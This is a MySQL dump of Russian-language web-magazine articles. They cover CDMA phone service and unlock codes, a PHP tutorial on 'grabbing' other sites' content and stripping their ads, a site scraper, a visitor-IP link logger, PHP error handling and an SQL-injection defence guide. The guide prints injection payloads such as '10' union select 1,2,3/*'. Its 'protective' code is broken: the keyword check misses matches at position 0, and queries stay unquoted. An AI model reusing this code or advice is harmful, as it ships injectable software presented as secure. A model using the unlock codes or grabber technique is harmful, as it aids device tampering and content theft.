2539**","Инженерне коды доступа на<br />телефонах стандарта CDMA","gazeta/img_754068.png","1375059624","4");
INSERT INTO gazeta_article VALUES("134","20","Коды доступа на телефоны стандарта<br />CDMA<br />AUDIOVOX 7900<br />Menu #(кл. конверт) * 1<br />AUDIOVOX 8610/8910<br />##847446(Выкл) пароль 000000 или 111111 (Стандартный SPC 072096--<br />для 8910)<br />AUDIOVOX 8910<br />для вывода телефона из сервис-<br />режима ##27752345 вкл<br />AUDIOVOX 8910 для вывода телефона из сервис-<br />режима ##737247 вкл<br />AUDIOVOX FT 3200<br />45680*47*869#1<br />COMPAL<br />**321456987## EPSILON<br />**321456987##,<br />**3214569871472365## снятие лок<br />кода<br />Kyocera KX-2<br />111111 (потом правая смарт клавиша)<br />Kyocera K112<br />236288<br />LG DM510 / DM150<br />menu 3 0 далее код<br />LG SV590 Menu 0, SPC code : 852456<br />a-key : *542362*2539*<br />LG 2130/2230<br />#542362#*542362*<br />LG VX3200<br />Menu-0(000000) LG VX9800(the V)<br />на большой клавиатуре нажать<br />кнопку Sym, 3477247, CLR, CLR, 1<br />LG 5130<br />#542362#*735130*<br />LG 6130 #542362#*736130*<br />LG 5550 код доступа в инженерное<br />меню<br />##7764726 save<br />Пароль на LG PM-325<br />инженерное меню : ##2342# открытие окна AKEY : ##2539#<br />NOKIA 3586i<br />*3001#12345#<br />NOKIA Sprint<br />##3282#<br />NOKIA 6305 код программирования ##7764726 Send<br />NOKIA 8587<br />*#626#7764726#<br />SKY 1400 / 3000 / 5000 / 5100 /<br />5400(Израиль)<br />#7583538324#626# SKY 5400 (корейская прош.) / 6100 /<br />6200<br />*759#626*7388464#<br />SKY 6400<br />*759#364*7388464<br />SAMSUNG A740 ( BELL )/A860 ( BELL ) ##675 OK<br />SAMSUNG A530/A620/N195/N356<br />menu 6 *<br />SAMSUNG N362(Израиль)<br />4367905#*10*#*913620<br />SAMSUNG A460/N240/A500/N400 ##000000<br />SAMSUNG A610<br />menu 9 *<br />SAMSUNG A630<br />menu 5 *<br />SAMSUNG A300/N105/A100/A562/A611 47*869#08#9 and menu 60<br />SAMSUNG A560<br />##3282#<br />SAMSUNG A660<br />menu ##000000 ok and ##3282 ok<br />SAMSUNG A670 menu 7 2 * (000000)<br />SAMSUNG A680<br />##000000##<br />SAMSUNG A790<br />menu 0 and menu 2 0<br />SAMSUNG A860 menu, setting *<br />SAMSUNG X, E, V-серия<br />6548#0**4#6 and 47*869#08#9 and<br />74153697193<br />SAMSUNG E300<br />741 53 697 193 SONY ERICSSON T608<br />923885 стрелка вправо<br />TELSON ТДС 320<br />menu 4 0 000000<br />MOTOROLA V710/V265<br />menu 073887* (быстро) MOTOROLA V8160<br />FCN 13 раз цифра"0" RCL<br />Kод доступа на Motorola RAZR V3<br />(americ)<br />#073887*<br />MOTOROLA MS600 5759789*# 3раза фото 915037<br />Пароль на MOTOROLA без а -кей<br />5 7 5 9 7 8 9 * # потом кнопку камеры<br />3 раза (код 915037)<br />Сделать полный сброс на MOTOROLA<br />V8160 FCN 00**83786633 STO далее 32# 01#<br />MODOTTEL (Withus) W100/200/300<br />##948487 ok<br />VK X100<br />код програмирования<br />153147539741593TV TOSHIBA 9100 / 9155 / 9500<br />В течении 10 сек. после включения<br />289 FCN #1<br />Z T E 150<br />код програмирования : *983*3641#<br />Как вводить A-key code HYUNDAI 310/610: 2539 menu menu<br />NOKIA 3586/3588 2539 end end<br />Многие др.модели 2539**","Инженерне коды доступа на<br />телефонах стандарта CDMA","gazeta/img_554817.png","1375060191","4");
INSERT INTO gazeta_article VALUES("135","18","1.Для начала ты должен<br />написать<br />2.Пишем $file = file ("http://<br />Адрес страницы-жертвы?<br />$QUERY_STRING");<br />$file = implode ("",$file); (Команда ?$QUERI_STRING<br />отдает команды исходному<br />скрипту , например, index.php?<br />action=dosug )<br />3. Командой<br />$file = str_replace('То, что требуется заменить','То, на что<br />надо заменить',$file);<br />Заменяем все, что надо заменить<br />(или вырезать, оставив место<br />между второй парой кавычек<br />пустым ). Заменяем все адреса и слова на<br />нужные вам (если не понятно, я<br />ниже напишу пример простейшего<br />граббера )<br />4. Убираем рекламу командой<br />$file = preg_replace('I(.*)I','', $file);<br />Этой командой мы вырезаем все<br />ссылки , в которых содержится<br />адрес на платный контент(в<br />данном случае это playfon.ru).<br />playfon.ru/ заменяем на адрес, который показывается в<br />рекламных ссылках с постоянно<br />меняющимися названиями . Обычно<br />их 1-3:) Для тех, кто не понял:<br />(.*)-простым языком-это как бы<br />джокер, может принимать любое<br />значение . И поэтому каждая<br />ссылка, содержащая в себе<br />адрес playfon.ru/(неважно, что<br />впереди или после, там ведь стоит<br />(.*) ) будет вырезаться. 5.Если, вдруг, вы собрались<br />ограбить загрузки, сделали<br />странички, а файлы не<br />скачиваются(пишет файл не<br />найден), значит скрипт<br />запрашивает файл с вашего сервера , на котором этих файлов<br />как раз нет:) Решение проблемы:<br />просто замените название вашей<br />папки , в которой лежит скрипт на<br />полный адрес до одноименной<br />папки того сайта , с которого вы грабите.(например,<br />$file = str_replace('/<br />download/','http://visavi.ne/ download/',$file);)<br />Тогда скрипт будет запрашивать<br />файлы на сервере , на котором<br />они и лежат. Этот метод подходит<br />к тем сайтам, где выдается<br />прямая ссылка на файл. 6. print "$file";<br />(Выводим получившееся)<br />?>","Учимся писать граберы","gazeta/img_404007.png","1375060404","4");
INSERT INTO gazeta_article VALUES("136","18","Статья ориентированна на опытных<br />программистов потому содержит<br />только теоретические сведения,<br />реализацию написанного здесь могу<br />предоставить совершенно бесплатно<br />администратору сайта либо известным мне пользователям по<br />просьбе.<br />Идея сохранять свойства экземпляров<br />класса во внешней памяти появилась<br />довольно давно. Совсем недавно<br />полностью ее реализовал на PHP MySQL. Что из себя представляет<br />система: реализована возможность<br />сохранить экземпляр класса во<br />внешней памяти компьютера, а затем<br />"идентифицировать" экземпляр того<br />же класса по известным свойствам. Перейду к терминологии: Постоянным<br />классом называется абстрактный<br />класс в котором определены методы<br />идентификации, добавления,<br />удаления и изменения данных.<br />Идентификатор - независимый от остальных свойств атрибут<br />однозначно идентифицирующий<br />данный экземпляр класса в базе<br />данных.<br />Идентификацию - метод<br />позволяющий заполнить свойства экземпляра класса их базы данных по<br />известным свойствам (на пример<br />определить рейтинг пользователя по<br />логину).<br />Удаление - метод позволяющий<br />стереть данные экземпляра класса из хранилища объектов (базы данных).<br />Добавление - метод позволяющий<br />добавить данные экземпляра класса<br />в хранилище объектов.<br />Изменение - метод позволяет<br />изменять любое свойство идентифицированного объекта<br />кроме идентификатора.<br />Теперь немного о плюсах парадигмы:<br />подобный подход позволяет хранить<br />объекты в реляционной базе данных,<br />востанавливать их свойства в любой момент времени, создавать связи<br />любой сложности и вложенности,<br />устраняет необходимость<br />составления запросов для<br />идентификации объектов.<br />На последок приведу реальный пример использования парадигмы<br />для авторизации пользователя:<br />$клиент = new Клиент();<br />$клиент->логин = 'Башка';<br />$клиент->пароль = 'абв';<br />$клиент->авторизировать(); /*<br />этого кода вполне достаточно чтобы<br />идентифицировать клиента по<br />заданному логину и паролю. Заранее<br />был определен дочерний класс<br />Клиент с перегрузкой методов идентификации и добавления<br />*/","Постоянный объект","gazeta/img_935558.png","1375060656","4");
INSERT INTO gazeta_article VALUES("137","18","На серъезных сайтах странно видеть,<br />когда ошибки выводятся<br />пользователю в браузер в самых<br />неожиданных местах. Почему они<br />появляются - это отдельный<br />разговор. Но почему они выводятся ? Ведь текст ошибок является<br />информацией для дебага и<br />предназначена для разработчика, а<br />не для клиента.<br />Кроме того, именно эта служебная<br />информация обычно помогает злым хакерам ломать сайт. В качестве<br />классического примера можно<br />привести вариант с выводом запроса<br />при ошибке: "you have an error in<br />query near WHERE id= "... Большое<br />спасибо. Подставляем после "WHERE id=..." строку "0 OR 1>0" и запрос<br />выполняется по всей таблице. Если<br />запрос на удаление, то...сами<br />понимаете, весело =). Поэтому я<br />всегда переменные в запросах<br />заключаю в кавычки. На всякий случай...<br />Но я увлекся. Сегодня не об этом.<br />Сегодня поговорим о том, как<br />избежать вывода ошибок клиенту,<br />сохранив при этом все сообщения<br />вебмастеру на память. Начнем, пожалуй, с краткого обзора<br />видов ошибок в РНР.<br />Числовое<br />значение Константа Описание<br />Ловится/нет<br />1 E_ERROR Фатальные ошибки. Например, ошибка при обращении к<br />памяти. Выполнение скрипта при<br />этом прерывается. нет<br />2 E_WARNING Предупреждения (не<br />фатальные ошибки). Выполнение<br />скрипта не прерывается. да 4 E_PARSE Ошибки во время анализа<br />синтаксиса. Генерируются парсером.<br />нет<br />8 E_NOTICE Замечания (менее<br />серьезные ошибки, чем<br />предупреждения). Указывают на ситуацию, которая может стать<br />причиной более серьезной ошибки,<br />но могут случаться и в процессе<br />нормальной работы скрипта. да<br />16 E_CORE_ERROR Ошибки во время<br />загрузки РНР. Аналог E_ERROR, генерируется ядром РНР. нет<br />32 E_CORE_WARNING Предупреждения<br />во время загрузки РНР Аналог E_<br />WARNING, генерируется ядром РНР.<br />нет<br />64 E_COMPILE_ERROR Фатальные ошибки во время компиляции кода.<br />Аналог E_ERROR, генерируется<br />зендовским движком. нет<br />128 E_COMPILE_WARNING<br />Предупреждения во время<br />компиляции кода. Аналог E_WARNING, генерируется зендовским движком.<br />нет<br />256 E_USER_ERROR Пользовательская<br />ошибка. да<br />512 E_USER_WARNING<br />Пользовательское предупреждение. да<br />1024 E_USER_NOTICE<br />Пользовательское замечание да<br />Нас интересуют те ошибки, которые<br />мы можем перехватить. К ним<br />относятся: E_WARNING, E_NOTICE и E_ USER_*. Остальные виды ошибок<br />перехвату не поддаются либо из-за<br />того, что происходят они еще до<br />окончания загрузки самого ядра РНР,<br />либо из-за того, что происходят на<br />этапе синтаксического анализа и компилирования РНР-кода, поэтому<br />их вывод придется просто<br />отключить:<br />ini_set('display_errors',0);<br />Но я предполагаю, что наши скрипты<br />достаточно отлажены, чтобы в них не было элементарных<br />синтаксических ошибок, поэтому<br />потерять мы ничего не должны.<br />По умолчанию уровень ошибок в РНР<br />имеет значение E_ALL & ~E_NOTICE<br />(или 2039 в числовой форме), что означает, что мы пропускаем мимо<br />ушей замечания, но сообщаем о всех<br />остальных ошибках.<br />Кстати, сами разработчики<br />рекомендуют включать на стадии<br />разработки и E_NOTICE - помогает обнаружить потенциально опасные<br />места.<br />Поэтому изменим уровень вывода<br />ошибок на E_ALL:<br />error_reporting(E_ALL);<br />Теперь переопределим хэндлер ошибок и подставим вместо него<br />нашу функцию user_log(), которая и<br />будет заниматься теперь обработкой<br />ошибок:<br />set_error_handler('user_log');<br />Рассмотрим эту функцию подробней. Ей передаются 5 параметров:<br />код ошибки<br />текст ошибки<br />имя файла, в котором произошла<br />ошибка<br />строка в файле массив переменных<br />Возвращать эта функция ничего не<br />обязана. Так как мы собираемся<br />просматривать потом лог ошибок, то<br />надо сделать запись лога, например,<br />в файл так, чтобы нам потом было удобно с ним работать.<br />Итак, код с комментариями:<br /><?php<br />/* Наша функция-хэндлер */<br />function user_log ($errno, $errmsg, $<br />file, $line) { // время события<br />$timestamp = time();<br />//формируем новую строку в логе<br />$err_str = $timestamp.'II';<br />$err_str .= $errno.'II';<br />$err_str .= $file.'II'; $err_str .= $line.'II';<br />$err_str .= $errmsg."\n";<br />//проверка на максимальный размер<br />if (is_file(LOG_FILE_NAME) AND filesize<br />(LOG_FILE_NAME)>=(LOG_FILE_<br />MAXSIZE*1024)) { //проверяем настройки, если<br />установлен лог_ротэйт,<br />//то "сдвигаем" старые файлы на<br />один вниз и создаем пустой лог<br />//если нет - чистим и пишем вместо<br />старого лога if (LOG_ROTATE===true) {<br />$i=1;<br />//считаем старые логи в каталоге<br />while (is_file(LOG_FILE_NAME.'.'.$i)) { $i+<br />+; }<br />$i--; //у каждого из них по очереди<br />увеличиваем номер на 1<br />while ($i>0) {<br />rename(LOG_FILE_NAME.'..'.$i,LOG_FILE_<br />NAME. '.' .(1+$i--));<br />} rename (LOG_FILE_NAME,LOG_FILE_<br />NAME.'.1');<br />touch(LOG_FILE_NAME);<br />}<br />elseif(is_file(LOG_FILE_NAME)) {<br />//если пишем логи сверху, то удалим //и создадим заново пустой файл<br />unlink(LOG_FILE_NAME);<br />touch(LOG_FILE_NAME);<br />}<br />}<br />/* проверяем есть ли такой файл<br />если нет - можем ли мы его создать<br />если есть - можем ли мы писать в<br />него<br />*/<br />if(!is_file(LOG_FILE_NAME)) { if (!touch(LOG_FILE_NAME)) {<br />return 'can\'t create log file';<br />}<br />}<br />elseif(!is_writable(LOG_FILE_NAME)) {<br />return 'can\'t write to log file'; }<br />//обратите внимание на функцию,<br />которой мы пишем лог.<br />error_log($err_str, 3, LOG_FILE_NAME);<br />}<br />?> Весь код вы можете посмотреть тут<br />или взять все в архиве.<br />Можно было бы, конечно,<br />использовать более логичное для<br />таких целей хранилище - базу, но<br />ведь ошибки, в большинстве своем, возникают именно при работе с<br />базой, поэтому я бы на нее не<br />полагался.<br />Собственно, это все. Остальное, я<br />думаю, не составит для вас труда,<br />особенно, если пользоваться функциями file(); & explode();. А если<br />все-таки составит, то вы можете<br />воспользоваться [вот этим кодом].<br />Предвидя вопрос "почему я не<br />использовал CSV, который, казалось<br />бы, логично использовать в этой ситуации?", отвечаю: сообщения об<br />ошибках могут содержать<br />неизвестное количество служебных<br />символов (ака запятых и точек с<br />запятой), что явно затруднило бы<br />разбор CSV. Да и не собираюсь я просматривать лог в Экселе.<br />Еще разные мысли на эту тему:<br />при устаревании лога gz'иповать<br />файл и складывать его в архив;<br />то же, но с посылкой на почту;<br />при возникновении критических ошибок - слать мэйл (см. пример из<br />мануала по функции set_error_<br />handler);<br />для мазохистов можно использовать<br />при этом XML.<br />Вздохнули спокойно? Я надеюсь, что нет. Ибо переопределение еррор-<br />хэндлера - это никак не панацея,<br />просто одна из удобных фич РНР.<br />Кто предупрежден, тот защищен -<br />так ведь?<br />ps Признаю, немного параноидален. Но лучше два раза проверить, чем<br />один раз сделать ошибку.<br />ps2 По просьбе Maxim Naumenko<br />добавляю комменты к статье:<br />Q: Ну и чем это лучше, чем просто в<br />php.ini указать error_log = "log_ file.log" ?<br />A: Файл пишется в нашем формате.<br />Нам же потом этот файл смотреть<br />надо. Плюс - можно делать что<br />угодно с этими ошибками (файл - это<br />просто для примера). А в случае с error_log = "" - они ТОЛЬКО пишутся в<br />файл и ничего более. Да и не везде<br />вас пустят к php.ini.","Ловля ошибок в PHP","gazeta/img_927011.png","1375060735","4");
INSERT INTO gazeta_article VALUES("138","18","Язык PHP очень функционален,<br />огромную роль на себя берут<br />подключаемые к интерпретатору<br />библиотеки с различными<br />функциями. Сегодня PHP благодаря<br />подключаемым библиотекам может обрабатывать самые популярные<br />форматы файлов, работать с<br />известными протоколами и многое<br />другое.<br />Не так давно на свет появилась еще<br />одна не менее полезная библиотека - WinBinder. Она позволяет создавать<br />GUI-приложения для Windows на<br />языке PHP. Грубо говоря, WinBinder -<br />библиотека и набор скриптов с<br />необходимыми функциями.<br />Взять дистрибутив можно здесь: http://winbinder.org/download.php. Для начала лучше скачать набор,<br />приготовленный разработчиками, а<br />потом, при желании, подключить к<br />нему другие библиотеки. Текущая<br />версия - 0.46.0 (alpha). Обратите<br />внимание, пока только альфа версия, но проект активно развивается.<br />При установке можно выбрать,<br />какую версию PHP использовать - 4, 5<br />или 5.1. Если выбрать 5 или 5.1, то<br />инсталлятор сам скачает библиотеки<br />для этих версий, но только библиотеки. Я выбрал 4 и 5, в<br />принципе можно обойтись только<br />четверкой, но, помнется, в прошлых<br />версиях была проблема<br />невозможности работать с MySQL,<br />которая решалась обновлением PHP до 5-ой версии.<br />В комплект входит интерпретатор<br />PHP с библиотеками GD2, SQLite,<br />FreeImage и WinBinder, документация<br />на английском языке, несколько<br />скриптов с различными функциями и большое количество примеров.<br />Исполняемые файлы имеют<br />расширение PHPW и представляют<br />собой обычные текстовые файлы,<br />которые можно просмотреть любым<br />текстовым редактором. Рекомендую так же настроить любимый редактор<br />на подсветку таких файлов, так же<br />как и файлов PHP.<br />Если вы хотите использовать PHP 5-<br />ой версии, то должны скачать архив<br />с минимальным набором PHP 5 (php50_minimal.zip) с той же<br />страницы что и сам WinBinder. Этот<br />архив нужно распаковать в папку<br />binaries\php50 и скопировать файл<br />php.ini из папки php4 в php50 и<br />убрать из него строки extension=php_ gd2.dll и extension=php_sqlite.dll.<br />Затем нужно ассоциировать файлы<br />*.phpw с приложением php-win.exe в<br />папке php50.<br />Надо заметить, что приложения,<br />написанные с использованием библиотеки WinBinder, получаются<br />очень маленькими, по сравнению с<br />полноценными языками<br />программирования, которые<br />специально придуманы для<br />системного программирования. Это объясняется тем, что это всего лишь<br />скрипты, и они не могут работать без<br />своего интерпретатора.<br />Разумеется, в настоящее время<br />создавать серьезные проекты на<br />биндере не стоит, но для создания простых утилит для личного<br />использования он просто не заменим,<br />разумеется, если вы знакомы с<br />языком PHP.","Знакомство с WinBinder","gazeta/img_776539.png","1375060794","4");
INSERT INTO gazeta_article VALUES("139","18","Написание парсера достаточно<br />нестандартная задача к которой на<br />первых парах тяжело подступится. В<br />этой статье я расскажу алгоритма для<br />парсинга почти любого сайта. В<br />примере я использую PHP. Для начала рассмотрим некоторые<br />необходимые функции и библиотеки:<br />file_get_contents(string $url) - функция<br />принимает в качестве параметра URL<br />(кроме этого там может быть просто<br />путь к файлу), на выходе возвращает содержимое страницы со всеми<br />тегами. У этой функции есть<br />недостатки, к примеру в User-agent<br />посылается значение переменной<br />user_agent из файла настроек PHP, а<br />это может помешать при парсинге. Библиотека CURL. Библиотека нужна<br />что бы можно было получать<br />содержимое страниц с заголовками<br />как у браузеров. Почитать более<br />подробно можно здесь: http:// ru2.php.net/manual/en/book.curl.php preg_match(string $pattern, string $<br />subject, array &$matches) – функция<br />для работы с регулярными<br />выражениями, на входе идут 3<br />парметра: $pattern – регулярное<br />выражение, $subject – строка где идет поиск по регулярному<br />выражению, $matches – массив<br />результатов).<br />preg_match_all(string $pattern, string $<br />subject, array &$matches) – та же<br />самая функция, что и preg_match, только она ищет все вхождения<br />шаблона.<br />Теперь перейдем к самому парсингу.<br />Объяснять буду на примере этого<br />сайта (vilblog.ru)<br />1. Рассмотрим сайт и определим принцип построения URL-ов, что бы<br />их можно по очереди открыть. К<br />пример на этом сайте посты<br />расположены на страницах с URL-ами<br />вида http://vilblog.ru/page/номер_ страницы. Всего страниц 4,<br />следовательно, необходимо открыть<br />в каждую из них внутри цикла, а<br />оттуда смотреть как устроены URL-ы<br />постов.<br />2. Тут возникает небольшая проблема, на странице могут быть<br />ссылки на другие посты, которые<br />расположены не на выбранной<br />странице, поэтому смотрим html-код,<br />что бы определить чем ссылки<br />заголовков постов отличаются от остальных. В нашем случае там вот<br />такой вот html-код: <h2><a href="http:// vilblog.ru/2010/01/26/onlajn-<br />treningi/" title="Онлайн тренинги"><br />Онлайн тренинги</a></h2> Как видно ссылка расположена<br />внутри тега h2. То есть внутри<br />регулярного выражения нужно<br />найти все что расположено внутри<br />тега A, который расположен внутри<br />тега H2 и извлечь атрибут href. 3. После того как мы получили URL-ы<br />всех статей нам необходимо<br />отпарсить их. Открываем любую и<br />смотрим где расположен html-код<br />самого контента. Тут все сложнее,<br />текст расположен между элементами: Прокомментировать</a></p><br />и<br /></p> Так же извлекаем его регулярным<br />выражением<br />4. Собственно сам код парсера: <?php<br />//массив с контентом<br />$cont = array();<br />//парсим в цикле 4 страницы<br />for($i=1;$i<=1;$i++)<br />{ //загружаем страницу<br />$data = file_get_contents("http:// vilblog.ru/page/".$i); //извлекаем ссылки<br />preg_match_all("/\<h2\>\<a\ href\=<br />\"(.*)\"/U",$data,$mch);<br />//в переменно $mch[1] получаем<br />массив ссылок на посты<br />//в цикле просматриваем все URL foreach($mch[1] as $p)<br />{<br />$tmp = "";<br />//загружаем пост<br />$post = file_get_contents($p);<br />//извлекаем содержимое страницы (ТУТ СПЕЦBFАЛЬНО СДЕЛАНА ОШBБКА)<br />preg_match_all("/ть\<\/a\>\<\/p\>(.*)<br />\<p\ class\=\"meta2\"\>/",$post,$<br />mch2);<br />//убираем ненужные пробелы<br />$tmp = trim($mch2); $cont[] = $tmp;<br />}<br />}<br />//на выходе получаем массив $cont со<br />всеми статьями блога<br />?>'; Большинство сайтов можно<br />отпарсить таким способом только<br />лишь изменяя регулярные<br />выражения. Кроме контента с html-<br />кода страницы можно извлечь<br />ключевые слова, мета-описания, заголовок и другое.<br />Источник взят с: http://vilblog.ru/2010/04/02/parsery-<br />na-php-chast-1/","Как Написать Парсер на PHP","gazeta/img_460457.png","1375060900","4");
INSERT INTO gazeta_article VALUES("140","18","Итак наша задача записать все<br />данные пользователя который<br />переходит по ссылке через<br />определённый скрипт.<br />Он будет сохранять<br />IP,браузер,реферер,дату перехода в определённый файл и вывести все<br />переходы на странице .<br />Создадим файл away.php - это будет<br />файл который сохранит данные: <?php<br />$away_get = isset($_GET['to']) ?<br />htmlspecialchars($_GET['to']) : 'http:// google.com'; // обработка переменной<br />if(isset($_GET['to'])){<br />if(preg_match('~(http://(www.)?[0-9a-z<br />\.\-]+\.[0-9a-z]{2,6}[0-9a-zA-Z/\?\.\-<br />\~&;_=%:#\+]*)~', $away_get)) //<br />Проверяем параметры на правильность<br />{<br />$ip = htmlspecialchars($_SERVER<br />['REMOTE_ADDR']); // IP<br />$agent = htmlspecialchars($_SERVER<br />['HTTP_USER_AGENT']); // Браузер $ref = htmlspecialchars($_SERVER['HTTP_<br />REFERER']); // Реферер<br />$date = date('j M Y в H:i:s'); // Дата<br />$file = fopen("logs.txt","a+"); //<br />открываем файл для записи<br />fputs ($file, "$ipI$agentI$dateI$refI$ away_get\n"); //записуем данные<br />fclose ($file); //закрываем файл<br />header('Location: '.$away_get); //<br />Перебрасываем пользователя по<br />указаному адресу<br />} else<br />{<br />exit('Ошибка параметра <i>$_GET["to"]<br /></i>'); // выводим ошибку<br />}<br />} else<br />{<br />exit('Не передан параметр <i>$_GET<br />["to"]</i>'); // выводим ошибку<br />}<br />?> Создадим файл table.php - вывод<br />данных из logs.txt <html><body><br /><style><br />.tab {<br />border: #ccc 1px solid;<br />border-collapse: collapse;<br />empty-cells: show; }<br />.tab td {<br />border: #ccc 1px solid;<br />padding: 5px;<br />}<br /></style> <h3>Посещения по ссылкам</h3><br /><table class="tab"><tr><td>IP</<br />td><td>Браузер</td><td>Дата</<br />td><td>Реферер</td><td>Cсылка</<br />td></tr><tr><br /><? ini_set("max_execution_time",0);<br />$file=@file("logs.txt");<br />for ($i=0; $i<count($file); $i++) {<br />$tt=$file[$i];<br />list($ip,$agent,$date,$ref,$url)=explode<br />("I",trim($tt)); echo '<td>'.$ip.'</td><td>'.$agent.'</<br />td><td>'.$date.'</td><td>'.$ref.'</<br />td><td>'.$url.'</td></tr>';<br />}<br />?><br /></table> </body></html>","Делаем скрипт перехода по<br />ссылкам","gazeta/img_884992.png","1375060989","4");
INSERT INTO gazeta_article VALUES("141","18","Команда разработчиков<br />анонсировала внеочередное<br />обновление для php 5.2 — php<br />5.2.16. Это обновление исправляет<br />ошибку, которая обнаружилась сразу<br />же в предыдущей версии, и еще одну. Обновление настоятельно<br />рекомендовано всем, кто использует<br />open_basedir<br />Надо отметить, что за последние пару<br />дней это уже не первый релиз PHP,<br />посвященный ошибкам и безопасности, которым «стрельнула»<br />команда разработчиков<br />Главное то, что с этим обновлением<br />прекращается поддержка ветки<br />5.2.x. Переход на новую версию 5.3.4<br />для некоторых пользователей закончится различными варнингами<br />об устаревании функций (см. ниже) и,<br />как следствие, неработоспособность<br />некоторых элементов или всего сайта<br />— будьте осторожны и тестируйте<br />заранее свои сайты перед обновлением, например, на<br />виртуальных машинах.<br />Версия 5.2.16 от 16-Dec-2010<br />включает всего два исправления<br />* Исправлен баг #53517 (segfault в<br />pgsql_stmt_execute() когда сервер postgres остановлен). (gyp at balabit<br />dot hu)<br />* Исправлен баг #53516 (Ошибка в<br />обработке директивы open_basedir).<br />(Ilia)<br />Устаревшие функции в php 5.2.x и их эквиваленты в 5.3.x. Эти функции<br />вызовут ошибку, если используются в<br />новой версии php.<br />Если вы на сайте видите ошибки<br />function xxx is deprecated, найдите в<br />коде и замените эквивалентом Устаревшая Используйте<br />--------------------------------------------<br />call_user_method() call_user_func()<br />call_user_method_array() call_user_func_<br />array()<br />define_syslog_variables() - dl() -<br />ereg() preg_match()<br />ereg_replace() preg_replace()<br />eregi() preg_match() с модификатором<br />'i' в паттерне<br />eregi_replace() use preg_replace() с модификатором 'i' в паттерне<br />set_magic_quotes_runtime() -<br />magic_quotes_runtime() -<br />session_register() $_SESSION<br />(глобальная переменная)<br />session_unregister() $_SESSION session_is_registered() $_SESSION<br />set_socket_blocking() stream_set_<br />blocking()<br />split() preg_split()<br />spliti() preg_split() с модификатором 'i'<br />в паттерне sql_regcase() -<br />mysql_db_query() mysql_select_db() и<br />mysql_query()<br />mysql_escape_string() mysql_real_<br />escape_string()<br />А также: Передача категорий кодировок в<br />виде строки устарело. Используйте<br />константы LC_*<br />Вместо параметра is_dst к функции<br />mktime(), используйте новые<br />функции для работы со временем","Вышел PHP 5.2.16 и конец<br />поддержки 5.2.x","gazeta/img_899993.png","1375061104","4");
INSERT INTO gazeta_article VALUES("142","18","Самый простой способ защиты от SQL-<br />инъекции – «обрамлять» параметры<br />SQL-запроса одиночными кавычками<br />('), поскольку через GET- и POST-<br />запрос невозможно передать символ<br />одиночной кавычки (он будет автоматически заменен сочетанием<br />символов – \' – т.е. экранироваться). SELECT * FROM `table_name` WHERE<br />`param` = '$param_name' ORDER BY<br />`sort` ASC;<br />SQL-запрос в случае инъекции будет<br />выглядеть примерно так:<br />SELECT * FROM `table_name` WHERE `param` = '10 union select 1,2,3 /*'<br />ORDER BY `sort` ASC;<br />Т.е. для обработчика запросов, при<br />отбрасывании части запроса после /*,<br />запрос будет выглядеть примерно<br />так: SELECT * FROM `table_name` WHERE<br />`param` = '10 union select 1,2,3<br />Обработчик запросов, не найдя<br />закрывающей кавычки посчитает<br />этот запрос ошибочным и не<br />выполнит его. Если попытаться GET- запросом передать фрагмент кода с<br />кавычкой:<br />10' union select 1,2,3/*<br />, то, после отбрасывания<br />комментария, SQL-запрос будет<br />выглядеть так: SELECT * FROM `table_name` WHERE<br />`param` = '10\' union select 1,2,3 В этом случае обработчик также не<br />выполнит этот запрос, потому что не<br />найдет закрывающей кавычки, т.к.<br />сочетание символов \' будет<br />расценено не как закрывающая<br />кавычка, а как внутренний символ ', который должен содержаться в поле<br />`param`.<br />Однако такой способ не гарантирует<br />стопроцентной защиты от SQL-<br />инъекций. Приведем несколько<br />дополнительных способов Всегда проверяйте числовые<br />параметры функцией intval. При<br />проверке такого параметра:<br />10' union select 1,2,3/*<br />, функция intval вернет значение 10,<br />что исключает возможность SQL- инъекции. Однако не все параметры<br />являются числовыми. Например: http://somesite.dom/index.php?<br />section=about Здесь параметр section является<br />строковым, и функция intval здесь не<br />может быть применена. Что бы<br />избежать вредоносного запроса,<br />можно воспользоваться следующими<br />функциями: mysql_escape_string – экранирует все<br />спецсимволы;<br />Так же можно проверять строковые<br />параметры на наличие в них таких<br />слов как "select", "union", "order",<br />"char", "where", "from". Пример функции на PHP 5: <?php function escape_inj ($text) { <br/> $text = strtolower($text); // Приравниваем текст параметра к нижнему регистру<br /><br/> if ( <br/> !strpos($text, "select")<br />&& // <br/> !strpos($text, "union")<br />&& // <br/> !strpos($text, "select")<br />&& // <br/> !strpos($text, "order") && //<br />Ищем вхождение слов в параметре <br/> !strpos($text, "where") && // <br/<br />> !strpos($text, "char") && // <br/> !<br />strpos($text, "from") // <br/> ) { <br/><br />return true; // Вхождений нету -<br />возвращаем true <br/> } else { <br/><br />return false; // Вхождения есть - возвращаем false <br/> } <br/>} <br/><br />$section = $_GET[section]; // Читаем<br />параметр <br/>if (!escape_inj ($section)<br />) { // Проверяем параметр <br/> echo<br />"Это SQL-инъекция."; <br/> exit (); <br/<br />>} else { <br/> $result = mysql_query ("SELECT * FROM `tbl_name` WHERE<br />`section` = $section "); <br/> ... //<br />Продолжаем работу <br/>} ?> Строк: 1 Никогда не храните пароли в базе<br />данных в открытом виде,<br />обязательно шифруйте их (например,<br />функцией sha1). С помощью SQL-<br />инъекции легко "достать" данные из<br />базы данных, а если они будут зашифрованы, то есть большая<br />вероятность того, что<br />злоумышленник не сможет ими<br />воспользоваться.<br />Для обеспечения<br />конфиденциальности логина и пароля для доступа к базе данных,<br />функции подключения к базе данных<br />лучше хранить в отдельном файле и<br />подключать его в каждой странице<br />сайта.<br />Так же, отключение вывода на экран ошибок, возникших при неверном<br />запросе, сильно усложняет задачу<br />злоумышленнику. Что бы отключить<br />вывод ошибок достаточно написать<br />следующее (например, в файле<br />подключения базы данных): ini_set('display_errors', '0');<br />Старайтесь проверять результат<br />каждого выполняемого запроса на<br />выполнение и количество найденных<br />записей. Если их количество равно<br />нулю, перенаправляйте пользователя, например, на главную<br />страницу, это обеспечит хорошую<br />защиту от SQL-инъекций.<br />Пример на PHP 5: <?php<br />$section = $_GET[section]; // Читаем параметр <br/>$result = mysql_query<br />("SELECT * FROM `tbl_name` WHERE<br />`section` = $section "); // выполняем<br />запрос <br/>if (!$result II mysql_num_<br />rows ($result) == 0) { // Кол-во<br />найденных полей = 0, или запрос не был выполнен <br/> header<br />("Location: http://$_SERVER[HTTP_HOST]<br />/"); // Уходим на главную страницу<br /><br/> exit (); <br/>} else { <br/> ... //<br />Продолжаем работу <br/>} ?> Строк: 1 Если Ваш сайт не содержит разделов,<br />в которых производится запись или<br />редактирование строк в базе данных,<br />то необходимо у пользователя базы<br />данных, под которым происходит<br />соединение с базой, отключить все права, кроме права на чтение<br />данных. По-умолчанию, у<br />пользователя базы данных 